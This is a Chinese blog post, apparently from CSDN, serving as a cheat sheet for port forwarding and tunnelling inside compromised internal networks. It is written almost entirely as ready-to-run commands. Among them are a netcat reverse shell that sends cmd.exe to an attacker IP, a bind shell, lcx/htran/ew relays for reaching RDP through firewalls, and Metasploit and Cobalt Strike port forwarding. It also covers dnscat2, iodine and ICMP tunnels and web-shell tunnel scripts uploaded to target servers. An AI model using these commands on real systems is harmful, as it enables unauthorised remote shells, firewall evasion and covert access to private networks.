内网端口转发小技巧

最新推荐文章于 2024-05-25 07:15:00 发布
最新推荐文章于 2024-05-25 07:15:00 发布
阅读量1.6k 收藏 3
点赞数 1
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43271194/article/details/110393574
版权

端口转发

NC

反向连接

  • kali开启监听

    nc -lnvp 7777

在这里插入图片描述

  • 目标返向连接

    nc -e cmd.exe 192.168.95.128 7777

在这里插入图片描述

  • 可以执行命令

在这里插入图片描述

正向连接

  • 目标开启监听

    nc -l -p 5555 -e cmd.exe

  • kali连接

    nc -nvv 192.168.95.12 5555

  • 执行命令

在这里插入图片描述

lcx

外网无法访问内网,但内网可访问外网

  • client:转发自己的3389端口到远程端口7777上

    lcx.exe -slave rhost rport(7777) lhost lport(3389)

在这里插入图片描述

  • attack: 转发本地的7777端口到5555上

    portmap -m 2 -p1 7777 -p2 5555

    我的kali跑不了

  • 连接本地的5555端口:即可实现监听目标的3389

    rdesktop 127.0.0.1:5555

转发内网端口

lcx.exe -tran lport(7777) rhost(192.168.93.10) rport(3389)

rdesktop 192.168.0.106:7777

端口转发 + 绕过防火墙

3389转到53端口上,attack连接53端口
lcx.exe -tran lport lhost lport rdesktop rhost 53

netsh

windows自带规则配置工具

  • 添加一条规则:将远程的3389端口转发到本地的7777端口上

    netsh interface portproxy add v4tov4 listenport=7777 connect=3389 connectaddress=192.168.93.10 protocol=tcp

  • 查看转发规则:netsh interface portproxy dump

  • 删除转发规则:netsh interface portproxy delete v4tov4 listenport=7777

htran

绕过防火墙

  • 方法1:htran.exe -p -tran lport lhost lport

  • 方法2:htran.exe -p -slave rhost rport lhost lport portmap -m 2 -p1 xxxx -p2 xxxx

转发内网端口

  • 方法1:htran.exe -p -tran lport rhost rport

  • 方法2:

    将本地(win2012)的3389转发到目标(win2008)的7777上

    htran.exe -p -slave rhost(192.168.93.20) rport(7777) lhost(127.0.0.1) lport(3389)

    在目标上(win2008)监听本地7777端口,转发到9999端口htran.exe -p -listen 7777 9999

    attack 连接(win2008)9999端口,相当于连接了win2012的3389:rdesktop 192.168.0.106:9999

socat

  • 转发内网端口

    socket.exe TCP4-LISTEN:5555.reuseaddr.fork TCP4:192.168.93.10:3389

FPipe

  • 转发内网端口
    FPipe.exe -l lport -r rport rhost -v

portfwd

msf自带

  • 生成一个监听
  • portfwd add -l 1389 -r 192.168.93.10 -p 3389
  • 查看已建立的规则: portfwd list
  • 连接:rdesktop 192.168.0.108:1389 (此处是msf的地址)

cobalt strike

  • cs生成一个客户端,将其拿到目标机器是上运行,拿到一个会话

  • 然后进入交互模式

    rportfwd 8888 rhost 3389

    rportfwd stop 8888

rinetd

linux自带的一个文件,位于/etc/rinetd

  • 当外部主机是linux时,可使用其进行转发操作
    lhost lport rhost rport

ngrock

网络代理

socks代理

cobaltstrike
msf
  • 添加路由:run post/multi/manage/autoroute
  • 查看路由:run autoroute -p
  • 添加socks代理:use auxiliary/server/socks4a
  • 使用代理链工具调用代理:proxychains rdesktop 192.168.93.10
ew
  • 正向代理
  • 用法B(08):ew_win32.exe -s ssocksd -l 1080
    • 流量走向:A <··> B:1080 <··> C
  • 反向代理
    • win08本地流量转发:ew_win32.exe -s rssocks -l 1080 -e 8888
    • win12转发自身流量到08的8888端口:ew_win32.exe -s rssocks -d 192.168.93.20 -e 8888
      • kali连接:proxychains rdesktop 192.168.93.10
    • 流量走向:A(kali) <··> B(08):1080 <··> B:8888 <··>C(12)
    • 端口转发
Termite(白蚁)
  • 添加代理:socks 1080
  • 反弹一个shell:shell 7777

DNS代理

dnscat2
  • 服务端执行:ruby dnscat2.rb --dns "domain=pentestlab,host=192.168.0.108" --no-cache
  • 客户端连接:dnscat2-v0.07-client-win32.exe --dns server=192.168.0.108
    • 操作
    • 查看所有的会话:windows
      • 与指定会话交互:session -i
    • 得到一个shell:shell
      • 转到主界面:ctrl+z
iodine

备选,遇linux主机可一试

  • 服务端执行:iodined -p 123456 -f -DD 192.168.0.108 abc.com
  • 客户端:iodine -p 123456 -f -r -T TXT 192.168.0.108 abc.com

HTTP代理

ReDuh(不太好用)

java -jar reDuhClient.jar http://192.168.0.108/reduh.jsp

nc -w localhost 1010

[create Tunnel]1234:127.0.0.1:3389

Tunna
  • 把代理脚本上传到目标服务器,然后通过代理内网的某个端口,将敏感端口流量转发了外网的的某个端口,再通过本地连接外网的端口进行连接。
  1. 将代理脚本上传到目标服务器,在浏览器访问代理脚本是否被解析
  2. python proxy.py -u http://192.168.0.108/conn.php -l 4444 -r 3389 -s -v --no-socks
  3. 本地执行:rdesktop 127.0.0.1:4444
reGeorg

  • Neo-reGeorg (支持客户端的加密)

    • 设置密码并生成隧道文件:python neoreg py generate -k Scantime

  • 将隧道文件放到目标服务器的web目录,连接web服务器并建立本地socks代理:python neoreg.py -k scantime -u http://192.168.0.108/tunnel.php

    • Socks连接工具连接本地

ICMP代理

  • 运行前执行:sysctl -w net.ipv4.icmp_echo_ignore_all=1

  • 服务端:icmpsh_m.py lhost rhost

    • 客户端:icmpsh.exe -t serverhost
Amire0x
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试之内网渗透(四):端口转发
m0_74131821的博客
04-26 1919
在真实的错综复杂的企业环境中进行内网渗透,涉及内网穿透,端口转发,域渗透,提权等一系列的难题
内网端口转发
12-28
内网端口转发,监听本地端口,转发到一个新的端口,可用于3389远程桌面转发
linux下127.0.0.1(localhost)端口转到外网实现
孔乙己大叔的博客
07-30 1万+
简介 Rinetd是为在一个Unix和Linux操作系统中为重定向传输控制协议(TCP)连接的一个工具。Rinetd是单一过程的服务器,它处理任何数量的连接到在配置文件etc/rinetd中指定的地址/端口对。尽管rinetd使用非闭锁I/O运行作为一个单一过程,它可能重定向很多连接而不对这台机器增加额外的负担。 1、下载 wget http://www.boutell.
如何实现内网映射到公网?
热门推荐
qq_26486949的博客
08-02 3万+
有些时候我们需要把自己的笔记本当做服务器连接到公网上,以便让自己的小项目能够被其他人访问或者看到。正常情况,我们台电脑上网都应该是配备了一个公网ip的。但是呢,不幸的是我们的电脑所分配到的ip都是内网ip,因此我们无法让外部公网访问到我们的电脑。 绝大多数的IP地址都是公有地址,需要向国际互联网信息中心申请注册。但是在IPv4地址协议中预留了3个IP地址段,作为私有地址,供组织机构内部使用。这三个...
如何实现服务器对外开放?路由器端口映射怎么设置?
wat0612的博客
05-25 528
当访问数据到WAN口时,路由器会将访问请求数据的外部端口替换为内部端口,然后转发给内部服务器,这样服务器就可以正常接收访问。如果不知道服务器的端口,可以使用DMZ主机功能,将服务器开放给外网,外网电脑使用WAN口IP地址访问对应的服务器。快解析内网穿透的原理是通过云服务器与内网服务器建立连接,把内网端口映射到云端,以此实现各类局域网服务基于域名的互联网访问,整个过程不保留用户数据信息,核心数据仍保存在用户内网服务器上,而且,快解析曾荣获国家级高新技术企业认证,是少数获得多项核心专利的软件服务商。
HTran的实现端口转发
Teagle的博客
08-31 4722
HTran的基本使用软件:HTran2.4.exe参数:>HTran2.4.exe -h>HTran2.4.exe -p -h详解: -p -listen ConnectPort TransmitPort本地监听转发 -p -tran ConnectPort TransmitHost TransmitPort指定主机端口转发 将指定主机的指定端口转发到本地端口 -p -slave Connect
rinetd 实现接口转发,实现127.0.0.1 端口开放外网
hh_3157958147的博客
07-03 1310
Rinetd是为在一个Unix和Linux操作系统中为重定向传输控制协议(TCP)连接的一个工具。Rinetd是单一过程的服务器,它处理任何数量的连接到在配置文件rinetd.conf中指定的地址/端口对。简单配置即可实现 端口转发,解决 127.0.0.1端口不能外网访问问题wget https://github.com/samhocevar/rinetd/releases/download/v0.73/rinetd-0.73.tar.gztar -zxvf rinetd-0.73.tar.gzcd ri
IPOP4 内网端口转发工具
最新发布
06-14
【IPOP4内网端口转发工具】 IPOP4是一款强大的内网端口转发工具,它主要用于解决在内网环境中,由于网络限制无法直接访问公网服务的问题。通过端口转发技术,IPOP4使得内网用户能够通过一个公网入口访问原本无法...
内网穿透 - 端口转发
04-25
"端口映射器.e"文件很可能是整个端口转发程序的主控模块,负责配置和管理不同的端口转发规则,使得内网服务可以通过公网访问。用户可能可以通过配置文件或界面来设定源端口、目标地址和端口等参数。 其他文件如...
SSH端口转发实现内网穿透的实现
09-14
主要介绍了SSH端口转发实现内网穿透的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
C#端口转发用法详解
01-21
本文实例讲述了C#端口转发用法。分享给大家供大家参考。具体分析如下: 这里以链接3389的时候为例 例子1:连接a机器的3389端口连不上,因为对方防火墙或者网关做了限制,只能访问a机器的个别端口比如80。 例子2:...
端口转发工具(htran2.0)
09-27
很著名的端口转发工具,稳定可靠,可转发内网中任意端口,让你的内网机也能进入外网世界。
windows 端口转发.zip
06-07
- **安全远程访问**:通过SSH端口转发,可以安全地访问内网资源,所有数据都经过加密,增加了安全性。 - **负载均衡和代理**:端口转发也可以用于分发流量到多个服务器,或者作为代理服务隐藏后端服务器的IP地址。 ...
通过iptables实现端口转发内网共享上网.docx
09-30
通过iptables实现端口转发内网共享上网 本文将详细介绍如何使用iptables实现端口转发内网共享上网。iptables是一个Linux下的优秀的nat+防火墙工具,可以配置灵活强劲的防火墙+nat系统。 首先,需要说明的是,...
内网端口扫描工具.zip
07-18
内网端口扫描工具是网络安全领域中不可或缺的实用软件,主要功能是对内部网络中的设备进行端口探测,以便了解哪些服务正在运行、哪个端口是开放的,这对于网络管理和安全维护至关重要。本压缩包文件“内网端口扫描...
portforwarder端口转发工具
12-19
# 介绍: 很多时候运维服务器的...## 端口转发器>> ## 七陌科技 ## 映射的地址(入口地址) # 留空为默认 thisIp=0.0.0.0 thisPort=90 ## 要转发的地址 outIp=192.168.66.104 outPort=3306 ## 监控地址 panelPort=2018
AMBA总线协议(4)——AHB(二):基本传输
apple_53311083的博客
08-21 897
本文中我们详细讲述了关于AHB的基本操作流程,主机要先从仲裁器获得授权,然后进行总线的访问,这样可以避免总线冲突,获得授权后,主机给出地址和控制信号,从机根据自身情况进行响应,可以分成有等待的情况和无等待的情况,这主要通过从机控制HREADY信号实现。AHB传输共分成4种类型,由主机通过HTRANS体现。
渗透基础——端口转发与代理
D0126_的博客
04-25 912
源码来源于互联网,我在github做了备份,备份地址:https://raw.githubusercontent.com/3gstudent/test/master/HTran.cpp。· Client<-Transit server->Server:Client无法正向连接Transit server,但Transit server能够反向连接Client。Linux版HTran(lcx)的源码参考如下地址:https://github.com/windworst/LCX。
nginx如何实现内网端口转发
04-15
Nginx可以通过反向代理的方式实现内网端口转发。具体操作是在 Nginx 配置文件中配置 upstream 块,将指定的内网 IP 地址和端口作为后端服务器,然后在 location 块中通过 proxy_pass 指令将请求转发到该后端服务器。例如: upstream backend { server 10.10.10.10:8080; } location / { proxy_pass http://backend; } 这样,当外部请求访问该 Nginx 服务器的某个端口时,Nginx会将请求转发到指定的内网 IP 地址和端口上,实现内网端口转发

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值